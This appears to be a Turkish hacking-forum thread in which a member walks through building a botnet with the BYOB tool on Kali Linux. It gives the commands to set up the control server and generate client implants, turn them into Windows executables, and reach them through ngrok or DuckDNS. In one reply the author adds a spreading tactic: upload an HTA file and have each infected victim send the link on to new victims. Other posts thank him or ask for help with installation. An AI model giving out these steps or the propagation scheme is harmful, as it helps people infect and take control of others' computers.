Botnet ağı oluşturmak (Kali Linux)

Nikon of Disast

Uzman üye
16 May 2020
1,641
1,170

Hepinize merhaba TürkHackTeam mensupları bu konumda sizlere Kali Linux aracılığıyla Botnet Ağı oluşturmayı göstereceğim.

Öncelikle "git clone malwaredllc/byob" ile programımızı kuralım.

Programa 2 kez "cd byob" yazarak giriş yapalım.

"pip install -r requirements.txt" ile gerekli python kütüpahanelerini kuralım.

"python server.py --port 445" ile programı başlatalım.

"python client.py --name test.py *ip* *port*" şeklinde bir botnet açalım.

Sonuç:

Bu şekilde bir botnet açabilirsiniz, eğer dilerseniz pyinstaller ile exe'ye çevirebilirsiniz.

Hem Windows hem Linux'ta stabil şekilde çalışmakta.

Ngrok, duck duck dns vs.. çalışmakta.

Meterpreter ile uyumlu.

Konumuz bu kadardı, umarım konuyu faydalı bulmuşsunuzdur, eğer hata alırsanız belirtirseniz yardımcı olabilirim.

Son düzenleme:

The Gölge

Saldırı Timleri Genel Sorumlusu
16 May 2019
870
1,654
Saldırı Timleri Üst Kurulu

Hepinize merhaba TürkHackTeam mensupları bu konumda sizlere Kali Linux aracılığıyla Botnet Ağı oluşturmayı göstereceğim.

Sonuç:

Bu şekilde bir botnet açabilirsiniz, eğer dilerseniz pyinstaller ile exe'ye çevirebilirsiniz.

Konumuz bu kadardı, umarım konuyu faydalı bulmuşsunuzdur, eğer hata alırsanız belirtirseniz yardımcı olabilirim.

Eline emeğine sağlık dostum

Cyhper_

Yeni üye
24 Haz 2021
16
2
33
Hocam teşekkürler botnet ağı oluşturmak istiyordum ama nasıl yapacağımı bilmiyordum sayende öğrendim.

Son düzenleme:

Bam Bam

Yeni üye
30 Kas 2020
12
5

Sonuç:

Meterpreter ile uyumlu.

Merhaba, paylaşımınız için teşekkür ederim ancak nasıl kullanacağım konusunda da bilgi sahibi değilim, sayenizde küçük adımlarla ilerliyorum herhangi bir hata almadan uygulamayı kurdum.
iyi bir botnet saldırısının nasıl yapılacağı ile ilgili küçük bir açıklama ekleseydeniz keşke :(

Nikon of Disast

Uzman üye
16 May 2020
1,641
1,170
Merhaba, paylaşımınız için teşekkür ederim ancak nasıl kullanacağım konusunda da bilgi sahibi değilim, sayenizde küçük adımlarla ilerliyorum herhangi bir hata almadan uygulamayı kurdum.
iyi bir botnet saldırısının nasıl yapılacağı ile ilgili küçük bir açıklama ekleseydeniz keşke :(
Bir daha ki konuya inşAllah ama örnek olarak bir siteye upload edeceksin hta dosyası gibi, linke ilk giren enfekte olunca onun üzerinden diğer kurbanlara link atacaksın, bu taktik işine yarar umarım.

moze

Üye
23 Ağu 2017
165
0
Eskişehir
Building wheel for numpy (PEP 517): started
Şu whell for hatasını bir türlü çözemedim kafayı yiyeceğim. 3 saattir uğraşıyorum. Temiz kuruluma kadar gittim. Kalideyim. Yardımcı olabilir misin?

Nikon of Disast

Uzman üye
16 May 2020
1,641
1,170
Building wheel for numpy (PEP 517): started
Şu whell for hatasını bir türlü çözemedim kafayı yiyeceğim. 3 saattir uğraşıyorum. Temiz kuruluma kadar gittim. Kalideyim. Yardımcı olabilir misin?
pip3 install --upgrade pip veya pip install --upgrade pip sorununuzu çözebilir.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.